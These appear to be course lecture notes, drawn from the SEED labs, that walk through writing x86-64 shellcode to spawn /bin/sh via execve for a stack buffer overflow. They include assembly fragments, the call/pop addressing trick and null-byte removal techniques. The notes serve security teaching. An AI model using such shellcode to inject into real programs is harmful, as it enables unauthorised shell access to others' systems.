$\require{cancel}$

Buffer Overflow Background

This is from the seed labs
- Shell Code.
- Buffer Overflow
- Plus some stuff I know.
In the unix/linux operating system a new process is started through two system commands
- fork creates a new copy of the currently running process
- exec runs a different program in the current process.
Generally when you type a command the shell will
- fork so there are two copies of the shell running
- exec in the new shell to run the program you want.
We will not worry about fork today, but if you want to know more, cm*c 3580 and cm*c 4000
Exec is an entire family of commands
- We are worried about execve.
- Three arguments,
  - The full path to the program to run.
  - A new set of arguments.
  - A new enviornment
- Arguments are the flags you pass to your code.
showExec.cpp illustrates how this call works.
Calling from assembly
- The system call number for execve is 59
- It expects three arguments
  - A string which holds the command to run
  - A null terminated list of strings which are the arguments.
  - A null terminated list of strings which are the environment variables.
- For this example, we will put the string in the data section.
- This is done is
For a stack overflow attack, we would like to get this code onto the stack and have it called.
But we will not be able to include the assembly code, we will need machine code.
- Two linux commands to get this.
- objdump
  - objdump -d file
  - xxd -p -20 file
Getting the argv array setup
- const char * argv[]
- This is an array of pointers
- argv[0] should be the name of the program to be run.
- The "last" argument should be a null pointer (0)
- runSH.asm
Another problem is we will not have access to local .data segment
- We are going to inject this code, so it must be self contained.
- This is from Du's lab
- A segment of code called two
  - We can store anyting in code, so we will just put the arguments in the code segment.
  - ```
  two:
      call one
      db "/bin/sh",0
      db "aaaaaaaa"
      db "aaaaaaaa" 
```
- one will be a function that sets up for the system call.
  - It uses a trick.
  - It was called with call one
    - This puts the return address on the stack.
    - Which we can recover by poping the stack
    - Which is the address of the command string!
  - ```
     pop rbx 
```
- This stores the address of the next instruction (the command line) in rbx.
- ```
   mov [rbx+8], rbx
   mov rax, 0
   mov [rbx+16], rax 
```
  - Put the address of the command line into the argv[0]
  - And put a 0 into argv[1]
  - ```
     mov rdi, rbx
     lea rsi, [rbx+8]
     mov rdx, 0
     mov rax, 59
     syscall
```
- Set up the arguments and make the system call!
- see labCode.asm
Normally you are not allowed to read/write to the text segment.
- The loader controls this.
- It prevents self-modifiying code.
- But we need to do this, so --omagic
Du notes that this is not needed for the injection attack as the code will be placed on the stack, which is acceptable.
Look at the machine code now objdump -d labCode.o
- This has one problem left, the 00 byte pairs in the code.
- Rmember 00 is a string terminator
- And we will be injecting this code as a string.
- So we need to eliminate these.
There are two sources of zeros
- mov rax, 0
  - But we can replace this with xor rax, rax
- The zero terminator at the end of the string.
  - We can replace this with a nonsense character.
  - Then write a 0 to that.
  - ```
     pop rbx
  
     xor rax,rax
     mov [rbx+7],al
  ...
  db "/bin/sh",0xff 
```
- Loading eax with 59 introduces zeros as well.
  - But just clear eax with xor
  - The subtract -59 from it.
  - ```
     ;mov eax, 59
     xor eax, eax
    sub eax, -59 
```
- See noZero.asm